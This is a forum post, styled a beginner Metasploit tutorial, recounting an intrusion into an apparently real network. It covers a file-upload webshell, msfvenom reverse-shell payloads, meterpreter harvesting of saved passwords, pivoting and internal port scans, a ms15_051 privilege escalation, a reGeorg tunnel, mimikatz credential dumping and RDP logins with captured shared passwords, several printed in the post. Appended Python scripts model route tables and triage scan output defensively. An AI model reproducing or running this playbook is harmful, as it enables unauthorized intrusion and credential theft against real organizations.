Views: 1051 | Replies: 3

Metasploit complete penetration test: beginner tutorial

Posted by: Administrator, 2016-2-15 17:07:04
Found an arbitrary file upload vulnerability at http://xxxx.xxx.xx.xxx, so I went straight ahead and uploaded a webshell.

First, use Metasploit to generate a reverse-connect trojan, that is, a reverse payload:
Reverse payload generated successfully:
(1) Generate a Windows exe
msfvenom -a x86 --platform win -p windows/meterpreter/reverse_tcp LHOST=192.168.1.109 LPORT=5566 -f exe > /home/niexinming/back.exe
(2) Generate a Windows aspx
msfvenom -a x86 --platform win -p windows/meterpreter/reverse_tcp LHOST=192.168.1.109 LPORT=7788 -f aspx > /home/niexinming/back.aspx
For other ways of generating payloads see: http://netsec.ws/?p=331

(3) I generate an aspx reverse trojan

Then start msfconsole

(4) Local listener, the controlling side after the callback:
use exploit/multi/handler

(5) Choose which payload the local listener uses:
set payload windows/meterpreter/reverse_tcp

(6) Set the local listening port:
set lport 7788

(7) Set the local listening address:
set lhost 0.0.0.0

(8) Run:
run

(9) Visit the generated reverse trojan:
http://xxx.xxx.xx.xxx:/back.aspx

We get a meterpreter shell
(10) View routes from meterpreter:
run get_local_subnets

(11) Look for saved PuTTY information from meterpreter:
run enum_putty

(12) Look for passwords saved in IE from meterpreter:
run post/windows/gather/enum_ie

(13) Run cmd from meterpreter:
shell

To exit the cmd shell: ctrl+c

(14) Send meterpreter to the background:
background

(15) Add a route (needed before the internal network can be scanned):
route add 192.168.0.0 255.255.255.0 1
The first argument to route add is the address, the second is the netmask, and the third is the session id.
(This adds an entry to Metasploit's routing table so that traffic to 10.1.1.129 goes through meterpreter session 1:
route add 10.1.1.129 255.255.255.255 1

To proxy 10.1.1.129/24 through session 1 instead, write it like this:
route add 10.1.1.0 255.255.255.0 1
)
(16) Host discovery on the internal network, identifying hosts via SMB:
use auxiliary/scanner/smb/smb_version

First see which options this module needs:
show options

Set rhosts:
set rhosts 192.168.0.0/24

Set threads:
set threads 50

run
Results:
(17) Port scan:
use auxiliary/scanner/portscan/tcp

Set the scan range:
set rhosts 192.168.0.0/24

Set the ports to scan:
set ports 22,23,21,3389,1433,80,8080,81,82

Set threads:
set threads 50

Run:
run

Results:
  • 192.168.0.7:23 - TCP OPEN
  • 192.168.0.7:80 - TCP OPEN
  • 192.168.0.18:3389 - TCP OPEN
  • 192.168.0.9:80 - TCP OPEN
  • 192.168.0.9:23 - TCP OPEN
  • 192.168.0.18:1433 - TCP OPEN
  • 192.168.0.5:23 - TCP OPEN
  • 192.168.0.4:23 - TCP OPEN
  • 192.168.0.4:80 - TCP OPEN
  • 192.168.0.6:80 - TCP OPEN
  • 192.168.0.5:80 - TCP OPEN
  • 192.168.0.6:23 - TCP OPEN
  • Scanned  30 of 256 hosts (11% complete)
  • 192.168.0.55:3389 - TCP OPEN
  • 192.168.0.88:3389 - TCP OPEN
  • 192.168.0.88:1433 - TCP OPEN
  • 192.168.0.88:80 - TCP OPEN
  • Scanned  73 of 256 hosts (28% complete)
  • Scanned  81 of 256 hosts (31% complete)
  • 192.168.0.120:80 - TCP OPEN
  • 192.168.0.127:1433 - TCP OPEN
  • 192.168.0.129:1433 - TCP OPEN
  • 192.168.0.128:22 - TCP OPEN
  • 192.168.0.129:80 - TCP OPEN
  • 192.168.0.130:1433 - TCP OPEN
  • 192.168.0.130:3389 - TCP OPEN
  • 192.168.0.127:3389 - TCP OPEN
  • 192.168.0.128:80 - TCP OPEN
  • 192.168.0.135:8080 - TCP OPEN
  • 192.168.0.129:3389 - TCP OPEN
  • 192.168.0.130:8080 - TCP OPEN
  • 192.168.0.134:3389 - TCP OPEN
  • 192.168.0.135:3389 - TCP OPEN
  • 192.168.0.135:1433 - TCP OPEN
  • 192.168.0.131:1433 - TCP OPEN
  • 192.168.0.135:80 - TCP OPEN
  • 192.168.0.131:80 - TCP OPEN
  • 192.168.0.139:80 - TCP OPEN
  • 192.168.0.131:3389 - TCP OPEN
  • 192.168.0.136:80 - TCP OPEN
  • 192.168.0.139:1433 - TCP OPEN
  • 192.168.0.136:8080 - TCP OPEN
  • 192.168.0.136:3389 - TCP OPEN
  • 192.168.0.136:1433 - TCP OPEN
  • 192.168.0.139:3389 - TCP OPEN
  • 192.168.0.139:8080 - TCP OPEN
  • 192.168.0.120:22 - TCP OPEN
  • Scanned 111 of 256 hosts (43% complete)
  • Scanned 128 of 256 hosts (50% complete)
  • 192.168.0.155:22 - TCP OPEN
  • 192.168.0.160:1433 - TCP OPEN
  • 192.168.0.160:21 - TCP OPEN
  • 192.168.0.160:82 - TCP OPEN
  • 192.168.0.160:22 - TCP OPEN
  • 192.168.0.161:8080 - TCP OPEN
  • 192.168.0.160:3389 - TCP OPEN
  • 192.168.0.160:80 - TCP OPEN
  • 192.168.0.175:80 - TCP OPEN
  • 192.168.0.172:80 - TCP OPEN
  • 192.168.0.172:82 - TCP OPEN
  • 192.168.0.161:22 - TCP OPEN
  • 192.168.0.161:80 - TCP OPEN
  • 192.168.0.175:1433 - TCP OPEN
  • 192.168.0.175:3389 - TCP OPEN
  • 192.168.0.172:3389 - TCP OPEN
  • 192.168.0.170:1433 - TCP OPEN
  • 192.168.0.176:3389 - TCP OPEN
  • 192.168.0.176:1433 - TCP OPEN
  • 192.168.0.178:3389 - TCP OPEN
  • 192.168.0.176:80 - TCP OPEN
  • 192.168.0.177:1433 - TCP OPEN
  • 192.168.0.178:1433 - TCP OPEN
  • 192.168.0.170:80 - TCP OPEN
  • 192.168.0.174:3389 - TCP OPEN
  • 192.168.0.177:3389 - TCP OPEN
  • 192.168.0.181:80 - TCP OPEN
  • 192.168.0.181:3389 - TCP OPEN
  • 192.168.0.174:80 - TCP OPEN
  • 192.168.0.181:1433 - TCP OPEN
  • 192.168.0.179:3389 - TCP OPEN
  • 192.168.0.179:1433 - TCP OPEN
  • 192.168.0.182:3389 - TCP OPEN
  • 192.168.0.182:80 - TCP OPEN
  • 192.168.0.185:3389 - TCP OPEN
  • 192.168.0.185:1433 - TCP OPEN
  • 192.168.0.189:80 - TCP OPEN
  • 192.168.0.189:21 - TCP OPEN
  • 192.168.0.189:22 - TCP OPEN
  • 192.168.0.185:80 - TCP OPEN
  • 192.168.0.189:8080 - TCP OPEN
  • 192.168.0.189:3389 - TCP OPEN
  • 192.168.0.191:80 - TCP OPEN
  • 192.168.0.188:3389 - TCP OPEN
  • 192.168.0.189:1433 - TCP OPEN
  • 192.168.0.151:22 - TCP OPEN
  • 192.168.0.170:3389 - TCP OPEN
  • 192.168.0.181:8080 - TCP OPEN
  • 192.168.0.179:80 - TCP OPEN
  • 192.168.0.191:3389 - TCP OPEN
  • Scanned 172 of 256 hosts (67% complete)
  • Scanned 180 of 256 hosts (70% complete)
  • 192.168.0.200:80 - TCP OPEN
  • 192.168.0.201:22 - TCP OPEN
  • 192.168.0.202:22 - TCP OPEN
  • 192.168.0.203:8080 - TCP OPEN
  • 192.168.0.206:22 - TCP OPEN
  • 192.168.0.205:3389 - TCP OPEN
  • 192.168.0.204:22 - TCP OPEN
  • 192.168.0.216:22 - TCP OPEN
  • 192.168.0.215:3389 - TCP OPEN
  • 192.168.0.203:80 - TCP OPEN
  • 192.168.0.218:80 - TCP OPEN
  • 192.168.0.230:22 - TCP OPEN
  • 192.168.0.233:8080 - TCP OPEN
  • 192.168.0.237:3389 - TCP OPEN
  • 192.168.0.231:22 - TCP OPEN
  • 192.168.0.225:8080 - TCP OPEN
  • 192.168.0.226:22 - TCP OPEN
  • 192.168.0.225:22 - TCP OPEN
  • 192.168.0.227:8080 - TCP OPEN
  • 192.168.0.232:22 - TCP OPEN
  • 192.168.0.236:22 - TCP OPEN
  • 192.168.0.229:22 - TCP OPEN
  • 192.168.0.223:22 - TCP OPEN
  • 192.168.0.234:22 - TCP OPEN
  • 192.168.0.235:3389 - TCP OPEN
  • 192.168.0.205:80 - TCP OPEN
  • 192.168.0.203:22 - TCP OPEN
  • 192.168.0.207:22 - TCP OPEN
  • 192.168.0.227:80 - TCP OPEN
  • 192.168.0.224:22 - TCP OPEN
  • 192.168.0.235:1433 - TCP OPEN
  • 192.168.0.233:22 - TCP OPEN
  • 192.168.0.235:80 - TCP OPEN
  • Scanned 226 of 256 hosts (88% complete)
  • 192.168.0.238:80 - TCP OPEN
  • 192.168.0.239:80 - TCP OPEN
  • 192.168.0.242:80 - TCP OPEN
  • 192.168.0.243:80 - TCP OPEN
  • 192.168.0.241:80 - TCP OPEN
  • 192.168.0.240:80 - TCP OPEN
  • 192.168.0.253:23 - TCP OPEN
  • 192.168.0.253:80 - TCP OPEN
  • 192.168.0.254:23 - TCP OPEN
  • 192.168.0.252:80 - TCP OPEN
  • 192.168.0.252:23 - TCP OPEN
  • 192.168.0.254:80 - TCP OPEN
  • Scanned 236 of 256 hosts (92% complete)
  • Scanned 256 of 256 hosts (100% complete)
  • Auxiliary module execution completed

Look for anonymous FTP on the LAN:
use auxiliary/scanner/ftp/anonymous

Set the IP range:
set rhosts 192.168.0.0/24

Set threads:
set threads 50

Results:

In the webshell, check privileges:
whoami

Privileges are high.

If privileges are low, check systeminfo, mainly looking at the installed patches:

The patch hasn't been installed, so the box can be taken instantly with the ms15_051 exploit.

Then add an account.

Then deploy reGeorg.

Upload:
tunnel.aspx

Then visit:
http://xxx.xxx.xxx.xx/tunnel.aspx
and see:
Georg says, 'All seems fine', which proves it can be used.

Then:
python reGeorgSocksProxy.py -p 1090 -u http://xxx.xxx.xxx.xxx/download/tunnel.aspx

Then use proxychains to reach the remote desktop:
proxychains rdesktop -a 16 -u hehe -p Admin#123 127.0.0.1

Then upload mimikatz ("kiwi") and dump the passwords:

Then log in with the administrator account:

Then open the remote desktop connection history and find that the administrator saved the password for 192.168.0.136 in a remote desktop connection:

Log in there and dump the local passwords:

One captured password is a shared password:
administraror
xseries_ellassay

Log in to the hosts with 3389 open.

First:
192.168.0.160

Then:
192.168.0.170

Username: xz
Password: xz

Log in to 192.168.0.181 with the shared password

Then log in to 192.168.0.170 with the shared password:

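The route-table explanation in step (15) (address, netmask, session id, and the difference between a /32 entry and a /24 entry) is easier to reason about with the matching rule written out. The script below is an added example, not code from the post or from Metasploit: it models a pivot route table with Python's standard ipaddress module and applies the usual most-specific-route-wins rule. The first two ROUTES entries mirror the post's commands; session 2 is a hypothetical second pivot added only to show precedence, and reachable_per_session is a reviewer's helper for seeing how many addresses each route entry exposes.

```python
import ipaddress
from typing import Dict, List, Optional, Tuple

Route = Tuple[str, str, int]  # (network address, netmask, session id)

# Constructed route table. The first two entries mirror the "route add"
# commands in the post; session 2 is a hypothetical second pivot added to
# show that the more specific route takes precedence.
ROUTES: List[Route] = [
    ("192.168.0.0", "255.255.255.0", 1),
    ("10.1.1.129", "255.255.255.255", 1),
    ("10.1.1.0", "255.255.255.0", 2),
]


def _network(addr: str, mask: str) -> ipaddress.IPv4Network:
    # "address/netmask" is accepted directly; strict=False tolerates host bits.
    return ipaddress.ip_network(f"{addr}/{mask}", strict=False)


def route_for(dest: str, routes: List[Route] = ROUTES) -> Optional[int]:
    """Session id whose route covers dest, most specific (longest mask) first.

    Returns None when no route matches, i.e. the destination would be
    reached directly rather than through a pivot.
    """
    ip = ipaddress.ip_address(dest)
    best: Optional[int] = None
    best_len = -1
    for addr, mask, session in routes:
        net = _network(addr, mask)
        if ip in net and net.prefixlen > best_len:
            best, best_len = session, net.prefixlen
    return best


def reachable_per_session(routes: List[Route] = ROUTES) -> Dict[int, int]:
    """Number of addresses each session is asked to forward for.

    Useful when reviewing a pivot: a /32 entry exposes one host, a /24
    entry exposes 256 addresses.
    """
    counts: Dict[int, int] = {}
    for addr, mask, session in routes:
        counts[session] = counts.get(session, 0) + _network(addr, mask).num_addresses
    return counts


if __name__ == "__main__":
    for d in ("192.168.0.136", "10.1.1.129", "10.1.1.5", "172.16.0.1"):
        print(d, "->", route_for(d))
    print(reachable_per_session())
```

With the constructed table, 10.1.1.129 resolves to session 1 through the /32 entry even though session 2's /24 also covers it, while 10.1.1.5 falls through to session 2 and 172.16.0.1 matches nothing.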

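The port-scan listing in step (17) is raw scanner output, one "host:port - TCP OPEN" line at a time, interleaved with progress lines. The script below is an added example, not part of the post: it parses lines in that format into a per-host map and, from a defender's point of view, flags hosts on the segment that expose cleartext or management services (telnet, FTP, MSSQL, RDP), which is the triage a network owner would run over the same listing. SAMPLE_OUTPUT is a constructed excerpt in the same format, and the RISKY classification is this example's own assumption.

```python
import re
from collections import defaultdict
from typing import Dict, List, Set

# Constructed excerpt in the same format as the
# auxiliary/scanner/portscan/tcp listing in the post (not the post's data).
SAMPLE_OUTPUT = """\
  • 192.168.0.7:23 - TCP OPEN
  • 192.168.0.7:80 - TCP OPEN
  • 192.168.0.18:3389 - TCP OPEN
  • 192.168.0.18:1433 - TCP OPEN
  • Scanned  30 of 256 hosts (11% complete)
  • 192.168.0.160:21 - TCP OPEN
  • 192.168.0.160:3389 - TCP OPEN
  • 192.168.0.160:1433 - TCP OPEN
  • 192.168.0.128:22 - TCP OPEN
  • Auxiliary module execution completed
"""

# One "host:port - TCP OPEN" line, with or without a leading bullet.
OPEN_RE = re.compile(
    r"^\s*(?:[•*-]\s*)?(\d{1,3}(?:\.\d{1,3}){3}):(\d{1,5}) - TCP OPEN\s*$"
)

# Services a reviewer would want to see justified on an internal segment
# (assumed classification for this example).
RISKY: Dict[int, str] = {
    21: "ftp (cleartext)",
    23: "telnet (cleartext)",
    1433: "mssql",
    3389: "rdp",
}


def _ip_key(host: str):
    # Sort dotted quads numerically rather than lexically.
    return tuple(int(o) for o in host.split("."))


def parse_open_ports(text: str) -> Dict[str, Set[int]]:
    """Map each host to the set of ports reported TCP OPEN; progress lines are skipped."""
    hosts: Dict[str, Set[int]] = defaultdict(set)
    for line in text.splitlines():
        m = OPEN_RE.match(line)
        if m:
            hosts[m.group(1)].add(int(m.group(2)))
    return dict(hosts)


def exposure_report(hosts: Dict[str, Set[int]]) -> Dict[str, List[str]]:
    """Hosts exposing any RISKY service, with service names in port order."""
    report: Dict[str, List[str]] = {}
    for host in sorted(hosts, key=_ip_key):
        flagged = sorted(p for p in hosts[host] if p in RISKY)
        if flagged:
            report[host] = [RISKY[p] for p in flagged]
    return report


def hosts_with_port(hosts: Dict[str, Set[int]], port: int) -> List[str]:
    """All hosts with the given port open, sorted numerically by address."""
    return sorted((h for h, ports in hosts.items() if port in ports), key=_ip_key)


if __name__ == "__main__":
    found = parse_open_ports(SAMPLE_OUTPUT)
    for host, services in exposure_report(found).items():
        print(f"{host}: {', '.join(services)}")
    print("RDP hosts:", hosts_with_port(found, 3389))
```

Fed the full listing from the post, hosts_with_port(found, 3389) gives the set of RDP-exposed machines, which is exactly the set the post later walks through with a shared password; from the defender's side, that list is the one to check for accounts sharing credentials and for RDP exposure that has no business justification.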
20cn (user deleted)
Posted on 2016-2-20 21:04:41
Awesome! Learning from this.

Mr.冷雪 (user deleted)
Posted on 2016-2-29 22:03:41
Nice, thanks for sharing, learned something.
Powered by Discuz! © 2012-2015 Baiker Union of China.